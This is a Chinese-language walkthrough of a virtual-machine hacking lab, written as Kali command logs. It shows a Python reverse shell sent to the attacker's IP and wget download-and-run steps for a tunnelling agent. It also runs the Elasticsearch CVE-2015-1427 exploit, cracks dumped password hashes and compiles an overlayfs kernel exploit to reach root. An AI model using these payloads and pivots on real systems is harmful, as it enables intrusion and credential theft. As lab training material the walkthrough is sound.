● 主機發現
┌──(root?kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3e:92:fb, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 00:50:56:ff:c4:ee VMware, Inc.
192.168.10.2 00:50:56:c0:00:08 VMware, Inc.
192.168.10.15 00:0c:29:74:e0:7d VMware, Inc.
192.168.10.254 00:50:56:f1:51:7f VMware, Inc.
● 端口服務掃描
┌──(root?kali)-[~]
└─# nmap -p- 192.168.10.15
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-10 02:17 EST
Nmap scan report for 192.168.10.15
Host is up (0.00064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:74:E0:7D (VMware)
┌──(root?kali)-[~]
└─# nmap -p22,5000 -sC -sV 192.168.10.15
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 cc:53:20:b8:10:db:52:5f:16:02:bc:ee:57:22:80:e1 (DSA)
| 2048 01:50:f6:1f:32:e8:0d:fc:48:38:3e:c8:1b:ac:20:02 (RSA)
| 256 3b:ae:9a:bd:cb:ff:8f:54:64:32:ec:bf:38:fd:fe:6b (ECDSA)
|_ 256 77:4e:8b:20:73:52:a4:ee:93:1d:b3:85:f2:25:d7:55 (ED25519)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
MAC Address: 00:0C:29:74:E0:7D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
● web信息收集
用瀏覽器訪問http://192.168.10.15:5000，但在頁面上并沒有發現有用的信息
對http://192.168.10.15:5000進行目錄掃描,發現一個隱藏目錄admin
┌──(root?kali)-[~]
└─# dirsearch -u http://192.168.10.15:5000
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Target: http://192.168.10.15:5000/
[02:27:15] Starting:
[02:27:20] 200 - 401B - /admin
Task Completed
瀏覽器訪問http://192.168.10.15:5000/admin，發現可以執行命令
● 代碼注入
使用Python反彈shell，這段代碼將使用！先nc在Kali主機上監聽TCP5555端口
在http://192.168.10.15:5000/admin輸入Python Shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.100",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
● 反彈shell
┌──(root?kali)-[~]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 40592
/app #
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),
20(dialout),26(tape),27(video)
/app # whoami
root
/app # ls
Dockerfile
main.py
requirements.txt
templates
/app #
● 信息搜集
發現收到Shell為docker主機的root權限,但發現處于容器環境中
Tip:判斷主機為Docker容器的兩種方法:
方法一:確認根目錄下是否存在.dockerenv文件
ls /.dockerenv
方法二:查看/proc/1/cgroup是否存在docker目錄
cat /proc/1/cgroup
/app # ls /.dockerenv
/.dockerenv
/app # cat /proc/1/cgroup
11:hugetlb:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
10:perf_event:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
9:blkio:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
8:freezer:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
7:devices:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
6:memory:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
5:cpuacct:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
4:cpu:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
3:cpuset:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
2:name=systemd:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
/app #
內網主機掃描結果,發現172.17.0.1，172.17.0.2，172.17.0.3為存活主機
/app # for i in $(seq 1 254); do ping -c 1 172.17.0.$i; done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.044 ms
--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.044/0.044/0.044 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.035 ms
--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.035/0.035/0.035 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes
● 內網穿透
部署Venom內網穿透工具
Kali主機Venom目錄啟動Python3 Http Server,將Venom中的代理端程序傳給目標靶機
python3 -m http.server 80
┌──(root?kali)-[~/桌面/venom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.10.15 - - [10/Feb/2023 03:01:33] "GET /agent_linux_x64 HTTP/1.1" 200 -
啟動Venom管理端，監聽本地9999端口
./admin_linux_x64 -lport 9999
┌──(root?kali)-[~/桌面/venom]
└─# ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.10.15:36290
[+]A new node connect to admin node success 客戶端成功上線
靶機端安裝客戶端64位版本
cd /tmp
wget -c http://192.168.10.100/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
客戶端成功上線
┌──(root?kali)-[~]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 58313
/app #
/app # cd /tmp
/tmp # ls
/tmp #
/tmp # wget -c http://192.168.10.100/agent_linux_x64
Connecting to 192.168.10.100 (192.168.10.100:80)
agent_linux_x64 100% |*******************************| 3791k 0:00:00 ETA
/tmp # ls
agent_linux_x64
/tmp # chmod +x agent_linux_x64
/tmp # ./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
2023/02/10 08:02:03 [+]Successfully connects to a new node
客戶端成功上線
查看、控制Venom節點、啟動socks隧道
┌──(root?kali)-[~/桌面/venom]
└─# ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.10.15:36290
[+]A new node connect to admin node success 客戶端成功上線
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1 進入客戶端
node 1
(node 1) >>> socks 1080 在客戶端開socks端口，用1080端口代理服務端流量到內網網段
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>>
venom服務器(KALI)掛Socks對內網進行掃描
為實現用kali的強大功能對內網網段進行滲透，
需修改proxychains配置:使用socks5服務,啟用本地1080端口轉發kali發向內網的流量
vi /etc/proxychains4.conf
修改最后一行為:
socks5 127.0.0.1 1080
sudo proxychains nmap -Pn -sT -sV 172.17.0.1
Nmap scan report for 172.17.0.1 的結果
Host is up (0.0096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo proxychains nmap -Pn -sT -sV 172.17.0.2
Nmap scan report for 172.17.0.2 的結果
Host is up (0.0063s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
9200/tcp open http Elasticsearch REST API 1.4.2 (name: Ka-Zar; cluster: elasticsearch; Lucene 4.10.2)
sudo proxychains nmap -Pn -sT -sV 172.17.0.3
sudo proxychains nmap -Pn -sT -sV 172.17.0.3 的結果
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.3:5000 ... OK
Nmap scan report for 172.17.0.3
Host is up (0.0095s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
● 漏洞利用
利用Elasticsearch漏洞獲取目標靶機登錄用戶名和密碼
┌──(root?kali)-[~/桌面/venom]
└─# searchsploit elasticsearch
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metaspl | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Executi | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump | multiple/webapps/50152.py
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root?kali)-[~/桌面/venom]
└─# cp /usr/share/exploitdb/exploits/linux/remote/36337.py .
┌──(root?kali)-[~/桌面/venom]
└─# sudo proxychains python2 36337.py 172.17.0.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██? ██ ▓█████ ██▓ ██▓
▓█ ? ▓██? ?████▄ ?██ ? ▓ ██? ▓?▓██??██? ?█ ?██ ? ▓██? ██?▓█ ? ▓██? ▓██?
?███ ?██? ?██ ?█▄ ? ▓██▄ ? ▓██? ???██??▓█ ▄ ? ▓██▄ ?██??██??███ ?██? ?██?
?▓█ ▄ ?██? ?██▄▄▄▄██ ? ██?? ▓██▓ ? ?██??▓▓▄ ▄██? ? ██??▓█ ?██ ?▓█ ▄ ?██? ?██?
??████??██████?▓█ ▓██??██████?? ?██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████?
?? ?? ?? ??▓ ??? ▓?█?? ?▓? ? ? ? ?? ?▓ ? ?? ? ?? ?▓? ? ? ? ??????? ?? ?? ??▓ ?? ??▓ ?
? ? ?? ? ? ? ? ?? ?? ?? ? ? ? ? ? ? ? ? ?? ? ? ? ??? ? ? ? ?? ? ? ?? ? ? ?
? ? ? ? ? ? ? ? ? ? ?? ? ? ? ? ?? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ cat passwords
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
~$ id
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK
uid=0(root) gid=0(root) groups=0(root)
● 密碼破解
john:3f8184a7343664553fcb5337a3138814
1337hack
test:861f194e9d6118f3d942a72be3e51749
1234test
admin:670c3bbc209a18dde5446e5e6c1f1d5b
1111pass
root:b3d34352fc26117979deabdf1b9b6354
1234pass
jane:5c158b60ed97c723b673529b8a3cf72b
1234jane
● 本地提權
通過依次嘗試，john:1337hack可以登錄目標靶機
┌──(root?kali)-[~/桌面/venom]
└─# ssh john@192.168.10.15
john@192.168.10.15's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information as of Fri Feb 10 11:18:26 EST 2023
System load: 0.0 Processes: 390
Usage of /: 12.8% of 14.64GB Users logged in: 0
Memory usage: 5% IP address for eth0: 192.168.10.15
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Oct 28 22:36:16 2018 from 10.0.0.8
john@socnet:~$
john@socnet:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@socnet:~$ whoami
john
john@socnet:~$
john用戶提權失敗，
john@socnet:~$ sudo -s
[sudo] password for john:
john is not in the sudoers file. This incident will be reported.
嘗試內核提權
john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
john@socnet:~$
找漏洞利用代碼
┌──(root?kali)-[~/桌面/venom]
└─# searchsploit linux 3.13.0 ubuntu
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X8 | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Lo | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Pri | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilt | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16 | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / L | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via Us | linux/local/41760.txt
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
但是靶機沒有安裝gcc
john@socnet:~$ gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
john@socnet:~$
且查看37292.c腳本發現,還需編譯ofs-lib.so文件。所以考慮把ofs-lib.so文件從lib文件復制出,并注釋掉37292.c相關代碼再編譯,并將編譯后的文件和ofs-lib.so共同上傳目標靶機
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# vim 37292.c
注釋掉相關代碼
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
查找ofs-lib.so文件位置
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# gcc -o exp 37292.c
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# ls
36337.py 37292.c exp ofs-lib.so
編譯好的exp和ofs-lib.so上傳至目標靶機
kali啟動http server
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
靶機
在靶機上下載exp和ofs-lib.so
cd /tmp
wget http://192.168.10.100/exp
wget http://192.168.10.100/ofs-lib.so
john@socnet:/tmp$ ls
exp ofs-lib.so
john@socnet:/tmp$
john@socnet:/tmp$ chmod +x exp
john@socnet:/tmp$ ./exp
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)
尷尬了，執行不了。。。。（原因見上一行的報錯：exp在Kali上編譯時鏈接了GLIBC_2.34，而靶機是Ubuntu 14.04，其libc版本更舊，找不到這個版本符號）
只能試試老方法了，但是不切合實戰要求
就是給靶機安裝好gcc和g++
然后把.c源文件上傳到靶機里,在靶機里編譯好后執行。
john@socnet:/tmp$ gcc 37292.c
john@socnet:/tmp$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
# id
uid=0(root) gid=0(root) groups=0(root),1001(john)
# whoami
root
# ls -al
total 56
drwxrwxrwt 3 root root 4096 Feb 10 07:29 .
drwxr-xr-x 22 root root 4096 Oct 27 2018 ..
-rwxrwxr-x 1 john john 4975 Feb 10 06:54 37292.c
-rwxrwxr-x 1 john john 13652 Feb 10 07:29 a.out
-rwxrwxr-x 1 john john 16936 Feb 10 06:54 exp
drwxr-xr-x 2 root root 4096 Feb 10 07:23 gcc
# pwd
/tmp
#